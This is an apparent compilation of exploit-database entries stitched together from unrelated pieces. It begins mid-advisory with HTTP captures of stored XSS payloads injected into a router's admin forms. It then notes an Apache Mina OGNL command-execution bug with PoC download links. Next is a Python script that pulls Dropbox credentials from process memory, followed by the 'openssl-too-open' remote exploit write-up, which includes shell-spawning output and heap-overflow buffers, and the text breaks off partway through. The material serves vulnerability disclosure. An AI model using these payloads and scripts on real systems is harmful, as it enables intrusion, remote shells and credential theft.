connection_mode=0&saRgIpMgmtWanDualIpAddrIP0=0&saRgIpMgmtWanDualIpAddrIP1=0&saRgIpMgmtWanDualIpAddrIP2=0&saRgIpMgmtWanDualIpAddrIP3=0&saRgIpMgmtWanDualIpRipAdvertised=0x0&wan_ip_1=0&wan_ip_2=0&wan_ip_3=0&wan_ip_4=0&wan_mask_1=0&wan_mask_2=0&wan_mask_3=0&wan_mask_4=0&wan_gw_1=0&wan_gw_2=0&wan_gw_3=0&wan_gw_4=0&Host_Name=&Domain_Name=&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns1_4=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_dns2_4=0&wan_mtuSize=0&sysname=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sysPasswd=aaa&sysConfirmPasswd=aaa&remote_management=disable&upnp_enable=disable&save=Save+Settings&preWorkingMode=1&h_remote_management=disable&h_check_WebAccessUserIfLevel=2&h_upnp_enable=disable&h_wlan_enable=enable&h_user_type=common
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Quick_setup.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Quick_setup.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Administration.asp
Cookie: Lang=en; SessionID=457480
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 34779
(...)
<tr>
<td nowrap>
<script language="javascript" type="text/javascript">dw(va_local_access2);</script>
</td>
<td nowrap>
<script>alert('XSS')</script>
</td>
</tr>
(...)
8. Stored XSS in User Name #2 (Access Restrictions -> User Setup)
#1 - Request:
POST /goform/Rg_UserSetup HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_UserSetup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
NewUser=user onmouseover=alert('XSS')&Btn_AddUser=Add+User&AddUser=1&UserList=Default&RemoveUser=0&UserConfigChanged=0
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_UserSetup.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Rg_UserSetup.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_UserSetup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 9706
(...)
<select onchange="submit();" name="UserList">
<option value=Default >1. Default<option value=user onmouseover=alert('XSS') selected>2. user onmouseover=alert('XSS
</select>
(...)
9. Stored XSS in ToD Filter
#1 - Request:
POST /goform/Rg_TodFilter HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_TodFilter.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 189
TodClient=<script>alert('XSS')</script>&TodAdd=Add&addTodClient=1&ToDComputers=No+filters+entered.&removeTodClient=&StartHour=12&StartMinute=00&StartAmPm=1&EndHour=12&EndMinute=00&EndAmPm=1
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_TodFilter.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Rg_TodFilter.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_TodFilter.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 9140
(...)
<select name="ToDComputers" onChange="submit();">
<option value=0 selected>1. <script>alert('XSS')</script>
</select>
(...)
10. Stored XSS in Rule Name (Access Restrictions -> Basic Rules)
#1 - Request:
POST /goform/Rg_ParentalBasic HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 282
NewContentRule=<script>alert('XSS')</script>&AddRule=Add+Rule&AddContentRule=1&ContentRules=0&RemoveContentRule=0&NewKeyword=&KeywordAction=0&NewDomain=&DomainAction=0&NewAllowedDomain=&AllowedDomainAction=0&ParentalPassword=*******&ParentalPasswordReEnter=*******&AccessDuration=30
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_ParentalBasic.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Rg_ParentalBasic.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 11126
(...)
<select name="ContentRules" onChange="submit();">
<option value=0 selected>1. Default<option value=1 >2. <script>alert('XSS')</script>
</select>
(...)
11. Stored XSS in Domain Name (Access Restrictions -> Basic Rules)
#1 - Request:
POST /goform/Rg_ParentalBasic HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 318
NewContentRule=&AddContentRule=&ContentRules=0&RemoveContentRule=0&NewKeyword=&KeywordAction=0&NewDomain=&DomainAction=0&NewAllowedDomain=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&AddAllowedDomain=Add+Allowed+Domain&AllowedDomainAction=1&ParentalPassword=*******&ParentalPasswordReEnter=*******&AccessDuration=30
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_ParentalBasic.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Rg_ParentalBasic.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 10741
(...)
<select name="AllowedDomainList" size=5>
<option value="1"><script>alert('XSS')</script>
</select>
(...)
12. Stored XSS in Network Name (e.g Wireless -> Basic Settings)
#1 - Request:
POST /goform/Quick_setup HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Quick_setup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
Password=&PasswordReEnter=&setup_wifi_enable=enable&ssid=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&security_mode=psk2_mixed&wpa_enc=tkip%2Baes&wpa_psk_key=231503725&radius_ip_1=0&radius_ip_2=0&radius_ip_3=0&radius_ip_4=0&keysize=64&tx_key=1&save=Save+Settings&h_setup_wifi_enable=enable&h_security_mode=psk2_mixed&h_wpa_enc=tkip%2Baes&qs_wds_setting=disable&UserId=
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Quick_setup.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Wireless.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Quick_setup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 51653
(...)
<tr>
<td>
<B><script language="javascript" type="text/javascript">dw(vwnetwork_name);</script></B>
</td>
<td colspan="2">
<script>alert('XSS')</script>
</td>
</tr>
(...)
13. Stored XSS in DDNS Settings (Setup -> DDNS)
#1 - Request:
POST /goform/Setup_DDNS HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Setup_DDNS.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
DdnsService=0&DdnsUserName=user" onmouseover=alert('XSS_1') x="&DdnsPassword=aaa x="&DdnsHostName=host" onmouseover=alert('XSS_2') x="y&save=Save+Settings
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Setup_DDNS.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Setup_DDNS.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Setup_DDNS.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 5738
(...)
<td>
<input name="DdnsUserName" type="text" size="16" maxlength="64" value="user" onmouseover=alert('XSS_1') x="" />
</td>
(...)
<td>
<input name="DdnsHostName" type="text" size="32" maxlength="256" value="host" onmouseover=alert('XSS_2') x="y" />
</td>
(...)
14. Stored XSS in Adv. VPN Setup (Security -> VPN -> Advanced Settings)
#1 - Request:
POST /goform/vpn_adv HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/vpn_adv.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 286
NegotiationMode=0&LocalIdentityType=2&LocalIdentity=abc%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22y&RemoteIdentityType=2&RemoteIdentity=abc%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22y&Phase1Encryption=2&Phase1Authentication=1&Phase1DhGroup=0&Phase1SaLifetime=28800&Phase2DhGroup=0
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/vpn_adv.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /vpn_adv.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/vpn_adv.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 10179
(...)
<td>
<input type="radio" name="LocalIdentityType" value="2" onClick="LocalIdentityTypeClicked();" />
<script language="javascript" type="text/javascript">dw(vs_identity_name);</script>
<input type="text" name="LocalIdentity" size="16" maxlength="32" value="abc" onmouseover=alert('XSS') x="y" />
</td>
(...)
<tr>
<td>
<input type="radio" name="RemoteIdentityType" value="2" onClick="RemoteIdentityTypeClicked();">
<script language="javascript" type="text/javascript">dw(vs_identity_name);</script>
<input type="text" name="RemoteIdentity" size="16" maxlength="32" value="abc" onmouseover=alert('XSS') x="y" />
</td>
</tr>
(...)
Source: https://remoteawesomethoughts.blogspot.com/2016/09/apache-mina-2013-remote-command.html
Apache Mina 2.0.13 uses the OGNL library in the “IoSessionFinder” class. Its constructor takes into parameter one OGNL expression. Then this expression is executed when the method “find” is called. This class seems to be only used in the JMX MINA component “IoServiceMBean”. When the IOServiceMBean is exposed trough JMX it is possible to abuse the function to execute an arbitrary command on the server.
**PoC.zip**
https://drive.google.com/open?id=0ByB_ASBOdiURbVBHMjFxeldmSDg
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40382-1.zip
**MinaJMXConsole.zip**
https://drive.google.com/file/d/0ByB_ASBOdiURQjVCTlYtREotVnM/view
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40382-2.zip
#####
# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://www.dropbox.com
# Date 06/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to account.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
username = ''
password = ''
found = 0
filename = "Dropbox.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
memory_dump.append(process.read(address,100))
for i in range(len(memory_dump)):
email_addr = memory_dump[i].split('email=')[1]
tmp_passwd = memory_dump[i].split('password=')[1]
username = email_addr.split('\x00')[0]
password = tmp_passwd.split('&is_sso_link=')[0]
if username != '' and password !='':
found = 1
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % urllib.unquote_plus(username)
print "[+] Password: %s" % password
if found == 0:
print "[-] Credentials not found! Make sure the client is connected."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
/*
* openssl-too-open.c - OpenSSL remote exploit
* Spawns a nobody/apache shell on Apache, root on other servers.
*
* by Solar Eclipse <solareclipse@phreedom.org>
*
* Thanks to Core, HD Moore, Zillion, Dvorak and Black Berry for their help.
*
* This code or any derivative versions of it may not be posted to Bugtraq
* or anywhere on SecurityFocus, Symantec or any affiliated site.
*
*/
---------[ ./openssl-too-open ]
openssl-too-open is a remote exploit for the KEY_ARG overflow in
OpenSSL 0.9.6d and older. It will give you a remote shell with the
priviledges of the server process (nobody when used against Apache,
root against other servers).
Only Linux/x86 targets are supported.
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <solareclipse@phreedom.org>
Usage: ./openssl-too-open [options] <host>
-a <arch> target architecture (default is 0x00)
-p <port> SSL port (default is 443)
-c <N> open N apache connections before sending the shellcode (default is 30)
-m <N> maximum number of open connections (default is 50)
-v verbose mode
Supported architectures:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (apache-1.3.19)
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)
Examples: ./openssl-too-open -a 0x01 -v localhost
./openssl-too-open -p 1234 192.168.0.1 -c 40 -m 80
---------[ ./openssl-scanner ]
openssl-scanner scans a number of hosts for vulnerable OpenSSL
implementations.
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <solareclipse@phreedom.org>
Usage: ./openssl-scanner [options] <host>
-i <inputfile> file with target hosts
-o <outputfile> output log
-a append to output log (requires -o)
-b check for big endian servers
-C scan the entire class C network the host belogs to
-d debug mode
-w N connection timeout in seconds
Examples: ./openssl-scanner -d 192.168.0.1
./openssl-scanner -i hosts -o my.log -w 5
---------[ Screenshots ]
$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <solareclipse@phreedom.org>
Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done
192.168.0.136: Vulnerable
$ nc 192.168.0.1 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html
./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <solareclipse@phreedom.org>
: Opening 30 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x810b3a0
ssl1 : 0x810b360
ssl2 : 0x810b4e0
* Addresses don't match.
: Opening 40 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x80fd668
ssl2 : 0x80fd668
* Addresses don't match.
: Opening 50 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x8103830
ssl2 : 0x8103830
: Sending shellcode
ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184
Reading tag
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.05$
---------[ How Does openssl-too-open Work? ]
It is important to understand the SSL2 handshake in order to successfully
exploit the KEY_ARG vulnerability.
---/ Typical SSL2 Handshake
Client Server
CLIENT_HELLO -->
<-- SERVER_HELLO
CLIENT_MASTER_KEY -->
<-- SERVER_VERIFY
CLIENT_FINISHED -->
<-- SERVER_FINISHED
The CLIENT_HELLO message contains a list of the ciphers the client supports,
a session id and some challenge data. The session id is used if the client
wishes to reuse an already established session, otherwise it's empty.
The server replies with a SERVER_HELLO message, also listing all supported
ciphers and includes a certificate with its public RSA key. The server
also sends a connection id, which will later be used by the client to
verify that the encryption works.
The client generates a random master key, encrypts it with the server's
public key and sends it with a CLIENT_MASTER_KEY message. This message
also specifies the cipher selected by the client and a KEY_ARG field,
which meaning depends on the specified cipher. For DES-CBC ciphers, the
KEY_ARG contains the initialization vector.
Now both the client and the server have the master key and they can generate
the session keys from it. All messages from this point on are encrypted.
The server replies with a SERVER_VERIFY message, containing the challenge
data from the CLIENT_HELLO message. If the key exchange has been successful,
the client will be able to decrypt this message and the challenge data returned
from the server will match the challenge data sent by the client.
The client sends a CLIENT_FINISHED message with a copy of the connection id
from the SERVER_HELLO packet. It is now the server's turn to decrypt this
message and check if the connection id returned by the client matches the
connection it sent by the server.
Finally the server sends a SERVER_FINISHED message, completing the handshake.
This message contains a session id, generated by the server. If the client
wishes to reuse the session later, it can send this session id with the
CLIENT_HELLO message.
---/ The KEY_ARG Buffer Overflow
The bug is in ssl/s2_srvr.c, in the get_client_master_key() function. This
function reads a CLIENT_MASTER_KEY packet and processes it. It reads the
KEY_ARG_LENGTH value from the client and then copies that many bytes in an
array of a fixed size. This array is part of the SSL_SESSION structure.
If the client specifies a KEY_ARG longer than 8 bytes, the variables in the
SSL_SESSION structure can be overwritten with user supplied data.
Let's look at the definition of this structure.
typedef struct ssl_session_st
{
int ssl_version; /* what ssl version session info is
* being kept in here? */
/* only really used in SSLv2 */
unsigned int key_arg_length;
unsigned char key_arg[SSL_MAX_KEY_ARG_LENGTH];
int master_key_length;
unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH];
/* session_id - valid? */
unsigned int session_id_length;
unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH];
/* this is used to determine whether the session is being reused in
* the appropriate context. It is up to the application to set this,
* via SSL_new */
unsigned int sid_ctx_length;
unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
int not_resumable;
/* The cert is the certificate used to establish this connection */
struct sess_cert_st /* SESS_CERT */ *sess_cert;
/* This is the cert for the other end.
* On clients, it will be the same as sess_cert->peer_key->x509
* (the latter is not enough as sess_cert is not retained
* in the external representation of sessions, see ssl_asn1.c). */
X509 *peer;
/* when app_verify_callback accepts a session where the peer's certificate
* is not ok, we must remember the error for session reuse: */
long verify_result; /* only for servers */
int references;
long timeout;
long time;
int compress_meth; /* Need to lookup the method */
SSL_CIPHER *cipher;
unsigned long cipher_id; /* when ASN.1 loaded, this
* needs to be used to load
* the 'cipher' structure */
STACK_OF(SSL_CIPHER) *ciphers; /* shared ciphers? */
CRYPTO_EX_DATA ex_data; /* application specific data */
/* These are used to make removal of session-ids more
* efficient and to implement a maximum cache size. */
struct ssl_session_st *prev,*next;
} SSL_SESSION;
It really looks better with VIM coloring. Anyway, we know the size of the
structure and it's allocated on the heap. The first thing that comes to
mind is to overwrite the next malloc chunk and then make the OpenSSL code
call free() on the SSL_SESSION structure.
After we send a CLIENT_MASTER_KEY message, we'll read a SERVER_VERIFY packet
from the server and then we'll respond with a CLIENT_FINISHED message.
The server uses this the contents of this message to verify that the
key exchange succeeded. If we return a wrong connection id, the server
will abort the connection and free the SSL_SESSION structure, which is
exactly what we want.
We'll overwrite the KEY_ARG array with 8 random bytes and the following
string:
unsigned char overwrite_next_chunk[] =
"AAAA" /* int master_key_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */
"AAAA" /* unsigned int session_id_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH]; */
"AAAA" /* unsigned int sid_ctx_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */
"AAAA" /* unsigned int sid_ctx_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */
"AAAA" /* int not_resumable; */
"\x00\x00\x00\x00" /* struct sess_cert_st *sess_cert; */
"\x00\x00\x00\x00" /* X509 *peer; */
"AAAA" /* long verify_result; */
"\x01\x00\x00\x00" /* int references; */
"AAAA" /* int timeout; */
"AAAA" /* int time */
"AAAA" /* int compress_meth; */
"\x00\x00\x00\x00" /* SSL_CIPHER *cipher; */
"AAAA" /* unsigned long cipher_id; */
"\x00\x00\x00\x00" /* STACK_OF(SSL_CIPHER) *ciphers; */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO_EX_DATA ex_data; */
"AAAAAAAA" /* struct ssl_session_st *prev,*next; */
"\x00\x00\x00\x00" /* Size of previous chunk */
"\x11\x00\x00\x00" /* Size of chunk, in bytes */
"fdfd" /* Forward and back pointers */
"bkbk"
"\x10\x00\x00\x00" /* Size of previous chunk */
"\x10\x00\x00\x00" /* Size of chunk, PREV_INUSE is set */
The "A" bytes don't affect the OpenSSL control flow. The other bytes must be
set to specific values to make the exploit work. For example, the peer and
sess_cert pointers must be NULL, because the SSL cleanup code will call
free() on them before it frees the SSL_SESSION structure.
The free() call will write the value of the bk pointer to the memory
address in the fd pointer + 12 bytes. We'll put our shellcode address
in the bk pointer and we'll write it to the free() entry in the GOT
table.
If you don't understand how freeing this malloc chunk overwrites the GOT
entry or don't know what the GOT table is, visit juliano's site at
http://community.core-sdi.com/~juliano/ and read some papers.
---/ Getting the Shellcode Address
There is only one little problem. We need a place to put our shellcode
and we need the exact shellcode address. The trick is to use the
SERVER_FINISHED message. This message includes the session id, which
is read from the SSL_SESSION structure. The server reads session_id_length
bytes from the session_id[] array and sends them to the client. We can
overwrite the session_id_length variable and complete the handshake.
If session_id_length is long enough, the SERVER_FINISHED message will
include the contents of the SSL_SESSION structure.
To get the contents of the session structure, we'll overwrite the
KEY_ARG array with 8 random bytes and the following string:
unsigned char overwrite_session_id_length[] =
"AAAA" /* int master_key_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */
"\x70\x00\x00\x00"; /* unsigned int session_id_length; */
Now let's imagine the heap state when we send our connection request.
We have a heap, which contains some allocated chunks of memory and a
large 'top' chunk, covering all free memory.
When the server receives the connection, it forks a child and the child
allocates the SSL_SESSION structure. If there has not been a signifficant
malloc/free activity, the fragmentation of the memory will be low and the
new chunk will be allocated from the beginning of the 'top' chunk.
